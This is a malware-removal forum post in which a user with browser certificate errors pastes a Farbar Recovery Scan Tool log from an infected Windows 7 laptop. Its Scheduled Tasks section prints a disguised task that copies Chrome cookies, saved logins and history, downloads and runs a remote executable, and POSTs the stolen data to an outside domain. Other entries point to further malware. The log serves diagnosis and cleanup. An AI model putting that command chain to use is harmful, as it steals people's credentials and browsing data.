Invalid certificates in browsers

Posted: 26 Oct 2021 16:05
by Eddydye
Please check my log. The browsers report invalid certificates, sometimes it says there is no internet connection, and when the browser is closed and reopened, a box pops up saying that the process is being used by another application, but there is nothing in the processes.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-10-2021
Ran by PC (administrator) on PC-PC (ASUSTeK Computer Inc. K50IJ) (26-10-2021 16:54:41)
Running from C:\Users\PC\Desktop
Loaded Profiles: PC
Platform: Microsoft Windows 7 Home Premium (X64) Language: Čeština (Česká republika)
Default browser: IE
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe
() [File not signed] C:\Program Files\ATKGFNEX\GFNEXSrv.exe
() [File not signed] C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe
(AlcorMicro Co., Ltd.) [File not signed] C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe
(ASUSTeK Computer Inc. -> ) C:\Program Files (x86)\ASUS\ATK Hotkey\Atouch64.exe
(ASUSTeK Computer Inc. -> ) C:\Program Files (x86)\ASUS\ControlDeck\ControlDeckStartUp.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ASUS CopyProtect\ASPG.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\AsLdrSrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\ATKOSD.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControl.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\KBFiltr.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\WDC.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\smartlogon.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Windows\AsScrPro.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\System32\FBAgent.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe
(ASUSTeK Computer Inc. -> ATK) C:\Program Files\P4G\BatteryLife.exe
(ASUSTeK) [File not signed] C:\Windows\SysWOW64\ACEngSvr.exe
(ATK) [File not signed] C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(CyberLink -> CyberLink) C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvc.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Google LLC -> Google LLC) [File not signed] C:\Program Files\Google\Chrome\Application\chrome.exe <29>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Rezhabeck) [File not signed] C:\Program Files (x86)\MachinerData\main.exe
(Rezhabeck) [File not signed] C:\Program Files (x86)\MachinerData\mp3RenamerPro.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\BM\TMBMSRV.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\TmProxy.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe
(VIA) [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDECK.EXE

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [UfSeAgnt.exe] => C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe [1022368 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [320000 2009-04-09] (AlcorMicro Co., Ltd.) [File not signed]
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [619392 2009-06-12] (ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.)
HKLM-x32\...\Run: [UpdateLBPShortCut] => C:\Program Files (x86)\CyberLink\LabelPrint\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink -> CyberLink Corp.)
HKLM-x32\...\Run: [UpdateP2GoShortCut] => C:\Program Files (x86)\CyberLink\Power2Go\MUITransfer\MUIStartMenu.exe [218408 2008-12-04] (CyberLink -> CyberLink Corp.)
HKLM-x32\...\Run: [HDAudDeck] => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe [2244096 2009-07-13] (VIA) [File not signed]
HKLM-x32\...\Run: [HControlUser] => C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe [105016 2009-06-19] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKOSD2] => C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe [8493624 2009-07-07] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKMEDIA] => C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe [159744 2009-04-20] (ASUS) [File not signed]
HKLM-x32\...\Run: [Setwallpaper] => c:\programdata\SetWallpaper.cmd
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Run: [Google Update] => C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleUpdateCore.exe [223816 2021-10-11] (Google LLC -> Google LLC)
HKLM\...\Windows x64\Print Processors\Canon MP250 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPD9W.DLL [28672 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MP250 series: C:\Windows\system32\CNMLM9W.DLL [336896 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\95.0.4638.54\Installer\chrmstp.exe [2021-10-25] (Google LLC -> Google LLC) [File not signed]
HKLM\Software\...\Authentication\Credential Providers: [{06FE45A8-6D92-44ba-A0F1-9A9BCDC8F5A7}] -> C:\Program Files (x86)\ASUS\SmartLogon\system\FaceCredentialProvider64.dll [2009-05-01] (ASUS) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FancyStart daemon.lnk [2009-10-06]
ShortcutTarget: FancyStart daemon.lnk -> C:\Windows\Installer\{60D6618B-153F-4353-8185-908E676E5888}\_DCE9A4DB2A5F2786140FA3.exe () [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\tmchlang.lnk [2009-10-06]
ShortcutTarget: tmchlang.lnk -> C:\Program Files\Trend Micro\Internet Security\TmChLang.exe (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {169201BA-EF95-4DBA-A040-93D29590C6AF} - System32\Tasks\ASUSControlDeck => C:\Program Files (x86)\ASUS\ControlDeck\ControlDeckStartUp.exe [17976 2009-07-23] (ASUSTeK Computer Inc. -> )
Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
Task: {3BA45A0D-24F6-4688-84BE-D1EA203FDFE0} - System32\Tasks\WC3 => C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe [1593344 2009-07-24] () [File not signed]
Task: {4CDF81D0-F7E2-48C8-817A-A530B90DD8DF} - System32\Tasks\Microsoft Windows Defender Update => C:\Program Files (x86)\Rezhabeck\mp3RenamerPro\mp3RenamerPro.exe
Task: {6E64456A-0201-4D80-BB77-5184B428C4FA} - System32\Tasks\Check Volumes => C:\Windows\SYSTEM32\CMD.EXE /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Local State" "C:\Users\PC\AppData\Local\Temp\OEROW4YA69" > NUL && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {7A61CC45-675A-42D9-BC0A-D3691F5842ED} - System32\Tasks\ASUS SmartLogon Console Sensor => C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe [305720 2009-05-19] (ASUSTeK Computer Inc. -> ASUS)
Task: {9EA161CC-94DA-40D4-AD7B-00389FB1DC3C} - System32\Tasks\ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [684544 2009-07-23] (ATK) [File not signed]
Task: {C02341A7-0F42-4050-B91B-7BBE20935F36} - System32\Tasks\ASUS Live Update => C:\Program Files (x86)\ASUS\ASUS Live Update\ALU.exe [51768 2007-11-30] (ASUSTeK Computer Inc. -> )
Task: {CA21A731-91AF-4714-8E6F-CFE619DD08A0} - System32\Tasks\Games\UpdateCheck_S-1-5-21-1878501408-2484808434-785971923-1000 => {CA22F5B1-E06F-4A2B-94FC-21E87FE53781} C:\Windows\System32\gameux.dll [2746368 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Task: {E24D73D5-BC2A-4F11-90B0-83E312366154} - System32\Tasks\ASUS P4G => C:\Program Files\P4G\BatteryLife.exe [267832 2009-07-29] (ASUSTeK Computer Inc. -> ATK)
Task: {F53D1F2C-4DBF-4EB4-9E7F-45350BE21FBF} - System32\Tasks\ASPG => C:\Program Files (x86)\ASUS\ASUS CopyProtect\aspg.exe [163384 2009-06-29] (ASUSTeK Computer Inc. -> ASUS)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 78.157.167.7 78.157.167.57
Tcpip\..\Interfaces\{6FBAB886-4307-4726-B9CB-F48F3A217E2B}: [DhcpNameServer] 78.157.167.7 78.157.167.57

FireFox:
========
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll [No File]
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.3 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2008-11-13] (Microsoft Corporation -> Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corporation)

Chrome:
=======
CHR Profile: C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default [2021-10-26]
CHR Notifications: Default -> hxxps//tadesco.org
CHR Extension: (Prezentace) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-01-03]
CHR Extension: (Dokumenty) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2021-01-03]
CHR Extension: (Disk Google) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-01-03]
CHR Extension: (YouTube) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-01-03]
CHR Extension: (Tabulky) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-01-03]
CHR Extension: (Dokumenty Google offline) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-10-25]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Gmail) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-01-03]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ATKGFNEXSrv; C:\Program Files\ATKGFNEX\GFNEXSrv.exe [94208 2007-08-08] () [File not signed]
R2 FastBootAgent; C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe [306232 2009-07-24] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S3 GoogleChromeElevationService; C:\Program Files\Google\Chrome\Application\95.0.4638.54\elevation_service.exe [1480024 2021-10-16] (Google LLC -> Google LLC) [File not signed]
R2 Main Service; C:\Program Files (x86)\MachinerData\mp3RenamerPro.exe [1683456 2021-07-05] (Rezhabeck) [File not signed]
R2 SfCtlCom; C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe [838528 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 SoundFlowPicker; C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe [1064960 2021-07-05] () [File not signed] <==== ATTENTION
R3 TMBMServer; C:\Program Files\Trend Micro\BM\TMBMSRV.exe [570632 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 TmProxy; C:\Program Files\Trend Micro\Internet Security\TmProxy.exe [917768 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ASMMAP64; C:\Program Files\ATKGFNEX\ASMMAP64.sys [14904 2007-07-24] (ASUSTeK Computer Inc. -> )
R3 athr; C:\Windows\System32\DRIVERS\athrx.sys [1394688 2009-06-20] (Microsoft Windows -> Atheros Communications, Inc.)
R3 ETD; C:\Windows\System32\DRIVERS\ETD.sys [112128 2009-06-12] (Microsoft Windows Hardware Compatibility Publisher -> ELAN Microelectronic Corp.)
R3 kbfiltr; C:\Windows\System32\DRIVERS\kbfiltr.sys [15416 2009-07-20] (ASUSTeK Computer Inc. -> )
R3 L1E; C:\Windows\System32\DRIVERS\L1E62x64.sys [55296 2009-06-09] (Microsoft Windows Hardware Compatibility Publisher -> Atheros Communications, Inc.)
R0 lullaby; C:\Windows\System32\DRIVERS\lullaby.sys [15928 2009-06-18] (ASUSTeK Computer Inc. -> Windows (R) Win 7 DDK provider)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1806400 2009-06-05] (SONIX TECHNOLOGY CO. , LTD -> )
R3 tmpreflt; C:\Windows\System32\DRIVERS\tmpreflt.sys [42000 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [107536 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 tmxpflt; C:\Windows\System32\DRIVERS\tmxpflt.sys [258064 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 vsapint; C:\Windows\System32\DRIVERS\vsapint.sys [1883152 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 16:52 - 2021-10-26 16:54 - 000000423 _____ C:\Users\PC\Desktop\Addition.txt
2021-10-26 16:47 - 2021-10-26 16:56 - 000017006 _____ C:\Users\PC\Desktop\FRST.txt
2021-10-26 16:47 - 2021-10-26 16:55 - 000000000 ____D C:\FRST
2021-10-26 16:42 - 2021-10-26 16:42 - 002310656 _____ (Farbar) C:\Users\PC\Desktop\FRST64.exe
2021-10-25 16:56 - 2021-10-25 16:56 - 000002244 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-25 16:56 - 2021-10-25 16:56 - 000002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-10-25 16:55 - 2021-10-25 16:55 - 000003388 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2021-10-25 16:55 - 2021-10-25 16:55 - 000003260 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2021-10-11 16:33 - 2021-10-11 16:33 - 001341272 _____ (Google LLC) C:\Users\PC\Downloads\ChromeSetup.exe

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 16:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfud.bin
2021-10-26 16:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfss.bin
2021-10-26 16:57 - 2021-07-13 16:04 - 000000004 _____ C:\ProgramData\rc.dat
2021-10-26 16:51 - 2021-07-13 16:03 - 000000004 _____ C:\ProgramData\lock.dat
2021-10-26 16:48 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2021-10-26 16:48 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2021-10-26 16:43 - 2021-01-03 19:43 - 000000000 ____D C:\Program Files (x86)\Google
2021-10-26 16:42 - 2021-07-13 16:03 - 000000056 _____ C:\ProgramData\lir.bats
2021-10-26 16:42 - 2009-10-06 11:33 - 000003004 _____ C:\Windows\system32\Tasks\ASUS Live Update
2021-10-26 16:41 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2021-10-26 16:38 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\system32\NDF
2021-10-25 17:06 - 2021-02-16 16:18 - 000002262 _____ C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-25 17:06 - 2021-02-16 16:18 - 000002203 _____ C:\Users\PC\Desktop\Google Chrome.lnk
2021-10-25 17:06 - 2009-10-06 11:35 - 000001145 _____ C:\Windows\system32\ServiceFilter.ini
2021-10-11 16:05 - 2021-02-16 16:16 - 000003558 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA
2021-10-11 16:05 - 2021-02-16 16:16 - 000003286 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core

==================== Files in the root of some directories ========

2021-07-13 16:03 - 2021-10-26 16:51 - 000000004 _____ () C:\ProgramData\lock.dat
2021-07-13 16:04 - 2021-10-26 16:57 - 000000004 _____ () C:\ProgramData\rc.dat
2021-07-13 16:03 - 2021-07-13 16:03 - 000000008 _____ () C:\ProgramData\ts.dat
2007-06-12 18:34 - 2007-06-12 18:34 - 000035822 _____ () C:\Program Files (x86)\Common Files\ASPG_icon.ico
2008-05-22 17:35 - 2008-05-22 17:35 - 000051962 _____ () C:\Program Files (x86)\Common Files\banner.jpg
2009-04-08 19:31 - 2009-04-08 19:31 - 000106496 _____ () C:\Program Files (x86)\Common Files\CPInstallAction.dll
2008-08-12 06:45 - 2008-08-12 06:45 - 000155648 _____ (ASUS) C:\Program Files (x86)\Common Files\MSIactionall.dll

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2021-03-31 16:37
==================== End of FRST.txt ========================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-10-2021
Ran by PC (26-10-2021 16:58:02)
Running from C:\Users\PC\Desktop
Microsoft Windows 7 Home Premium (X64) (2021-01-03 17:28:21)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================


(If an entry is included in the fixlist, it will be removed.)

Administrator (S-1-5-21-1878501408-2484808434-785971923-500 - Administrator - Disabled)
Guest (S-1-5-21-1878501408-2484808434-785971923-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1878501408-2484808434-785971923-1002 - Limited - Enabled)
PC (S-1-5-21-1878501408-2484808434-785971923-1000 - Administrator - Enabled) => C:\Users\PC

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Trend Micro Internet Security (Enabled - Up to date) {48929DFC-7A52-A34F-8351-C4DBEDBD9C50}
AS: Trend Micro Internet Security (Enabled - Up to date) {F3F37C18-5C68-ACC1-B9E1-FFA9963AD6ED}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Activation Assistant for the 2007 Microsoft Office suites (HKLM-x32\...\Activation Assistant for the 2007 Microsoft Office suites) (Version: - Microsoft Corporation)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Reader 9.1 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{5A22D889-FBDD-4AE8-86EC-089D45FC133E}) (Version: 1.2.17.25001 - Alcor Micro Corp.)
Asistent pro přihlášení ke službě Windows Live (HKLM-x32\...\{1E779810-ACCA-4483-BC76-12DFE055B452}) (Version: 5.000.817.1 - Microsoft Corporation)
ASUS AI Recovery (HKLM-x32\...\{06585B02-F20D-4AB2-9A64-86EF2AE0F8F0}) (Version: 1.0.6 - ASUS)
ASUS CopyProtect (HKLM-x32\...\{6B77A7F6-DD63-4F13-A6FF-83137A5AC354}) (Version: 1.0.0015 - ASUS)
ASUS FancyStart (HKLM-x32\...\{60D6618B-153F-4353-8185-908E676E5888}) (Version: 1.0.5 - ASUSTeK Computer Inc.)
ASUS LifeFrame3 (HKLM-x32\...\{1DBD1F12-ED93-49C0-A7CC-56CBDE488158}) (Version: 3.0.20 - ASUS)
ASUS Live Update (HKLM-x32\...\{E657B243-9AD4-4ECC-BE81-4CCF8D667FD0}) (Version: 2.5.9 - ASUS)
ASUS MultiFrame (HKLM-x32\...\{9D48531D-2135-49FC-BC29-ACCDA5396A76}) (Version: 1.0.0019 - ASUS)
ASUS Power4Gear Hybrid (HKLM\...\{1686C4D1-B1FD-42E8-B7A8-FB4C4DBA5BA8}) (Version: 1.1.19 - ASUS)
ASUS SmartLogon (HKLM-x32\...\{64452561-169F-4A36-A2FF-B5E118EC65F5}) (Version: 1.0.0007 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 1.02.0028 - ASUS)
ASUS Virtual Camera (HKLM-x32\...\{EC8BD21F-0CA0-4BBF-97D9-4A52B30041A1}) (Version: 1.0.17 - asus)
Asus_Camera_ScreenSaver (HKLM-x32\...\Asus_Camera_ScreenSaver) (Version: 2.0.0009 - ASUS)
Atheros Communications Inc.(R) AR8121/AR8113/AR8114 Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.16 - Atheros Communications Inc.)
ATK Generic Function Service (HKLM-x32\...\{D3D54F3E-C5C3-443D-978F-87A72E5616E8}) (Version: 1.00.0008 - ATK)
ATK Hotkey (HKLM-x32\...\{7C05592D-424B-46CB-B505-E0013E8E75C9}) (Version: 1.0.0051 - ASUS)
ATK Media (HKLM-x32\...\{D1E5870E-E3E5-4475-98A6-ADD614524ADF}) (Version: 2.0.0005 - ASUS)
ATKOSD2 (HKLM-x32\...\{3B05F2FB-745B-4012-ADF2-439F36B2E70B}) (Version: 7.0.0005 - ASUS)
Canon MP250 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MP250_series) (Version: - Canon Inc.)
ControlDeck (HKLM-x32\...\{5B65EF64-1DFA-414A-8C94-7BB726158E21}) (Version: 1.0.3 - ASUS)
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1720 - CyberLink Corp.)
CyberLink Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.2713 - CyberLink Corp.)
ETDWare PS/2-x64 7.0.5.5_WHQL (HKLM\...\Elantech) (Version: - )
Fast Boot (HKLM\...\{13F4A7F3-EABC-4261-AF6B-1317777F0755}) (Version: 1.0.3 - ASUS)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 95.0.4638.54 - Google LLC)
Google Chrome (HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Google Chrome) (Version: 94.0.4606.81 - Google LLC)
Choice Guard (HKLM-x32\...\{8FFC5648-FAF8-43A3-BC8F-42BA1E275C4E}) (Version: 1.2.87.0 - Microsoft Corporation) Hidden
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: - Intel Corporation)
Junk Mail filter update (HKLM-x32\...\{4AB8B41B-3AF1-46BE-99B0-0ACD3B300C0A}) (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Live Add-in 1.3 (HKLM-x32\...\{57F0ED40-8F11-41AA-B926-4A66D0D1A9CC}) (Version: 2.0.2313.0 - Microsoft Corporation)
